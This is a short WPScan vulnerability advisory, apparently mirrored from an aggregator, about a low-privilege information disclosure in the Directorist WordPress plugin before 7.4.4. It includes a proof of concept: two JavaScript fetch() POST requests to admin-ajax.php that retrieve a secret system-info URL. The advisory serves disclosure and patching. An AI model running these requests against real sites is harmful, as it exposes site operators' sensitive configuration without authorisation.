Directorist < 7.4.4 - Subscriber+ Sensitive Information Disclosure

2022-11-2800:00:00

Lana Codes

wpscan.com

vulnerability

directorist

plugin

access

sensitive information

poc

low privileges

system info disclosure

0.001 Low

EPSS

Percentile

29.9%

JSON

The plugin does not prevent users with low privileges (like subscribers) from accessing sensitive system information.

PoC

fetch(‘http://wpscan.local/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=send_system_info’, redirect: ‘follow’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error)); fetch(‘https://wpscan.local/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=generate_url’, redirect: ‘follow’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error)); Then we get the secret url for system info

CPENameOperatorVersion
directoristlt7.4.4

CPE	Name	Operator	Version
	directorist	lt	7.4.4

0.001 Low

EPSS

Percentile

29.9%

JSON

Related for WPVDB-ID:6AAD6454-DE1B-4304-9C14-05E28D08B253